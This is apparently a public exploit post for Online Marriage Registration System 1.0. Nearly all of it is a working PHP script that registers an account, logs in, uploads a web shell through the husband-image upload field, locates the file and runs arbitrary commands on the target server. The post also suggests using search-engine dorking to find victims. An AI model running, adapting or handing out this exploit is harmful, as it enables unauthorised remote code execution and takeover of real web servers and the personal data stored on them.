Online Marriage Registration System 1.0 Shell Upload
=============================================================================================================================================
| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir [+] payload :<?php
// Parse command line arguments
$options = getopt(“u:c:m:p:”);
$url = $options[‘u’] ?? null;
$command = $options[‘c’] ?? null;
$mobile = $options[‘m’] ?? null;
$password = $options[‘p’] ?? ‘inouvis2022’;
if (!$url || !$command) {
die(“Usage: php script.php -u <url> -c <command> \n”);
}
function login($url, $mobile, $password) {
$loginUrl = “{$url}/user/login.php”;
$ch = curl_init($loginUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
‘mobno’ => $mobile,
‘password’ => $password,
‘login’ => ”
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
curl_exec($ch);
curl_close($ch);
// Extract PHPSESSID from cookie file
$cookies = file_get_contents(‘cookie.txt’);
preg_match(‘/PHPSESSID=(\w+);/’, $cookies, $matches);
return $matches[1] ?? null;
}
function upload($url, $cookie) {
$uploadUrl = “{$url}/user/marriage-reg-form.php”;
$fileData = [
‘husimage’ => curl_file_create(‘shell.php’, ‘application/x-php’, ‘<?php $command = shell_exec($_REQUEST[“cmd”]); echo $command; ?>’),
‘wifeimage’ => curl_file_create(‘test.jpg’, ‘image/jpeg’)
];
$ch = curl_init($uploadUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
echo “[+] PHP shell uploaded\n”;
}
function getRemotePhpFiles($url) {
$filesUrl = “{$url}/”;
$ch = curl_init($filesUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
preg_match_all(‘/\d{10,42}\.php/’, $response, $matches);
return $matches[0];
}
function execCommand($url, $webshell, $command) {
$commandUrl = “{$url}/user/{$webshell}?cmd=” . urlencode($command);
$ch = curl_init($commandUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
echo “[+] Command output\n” . $output . “\n”;
}
function register($mobile, $password, $url) {
$signupUrl = “{$url}/user/signup.php”;
$ch = curl_init($signupUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
‘fname’ => ‘indoushka’,
‘lname’ => ‘indoushka’,
‘mobno’ => $mobile,
‘address’ => ‘indoushka’,
‘password’ => $password,
‘submit’ => ”
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
echo “[+] Registered with mobile phone $mobile and password ‘$password’\n”;
}
$mobile = $mobile ?? strval(rand(100000000, 999999999));
$password = $password ?? ‘inouvis-2022’;
if ($password === ‘inouvis-2022’ || $mobile === null) {
register($mobile, $password, $url);
}
$cookie = login($url, $mobile, $password);
$initialPhpFiles = getRemotePhpFiles($url);
upload($url, $cookie);
$finalPhpFiles = getRemotePhpFiles($url);
$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];
execCommand($url, $webshell, $command);
?>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================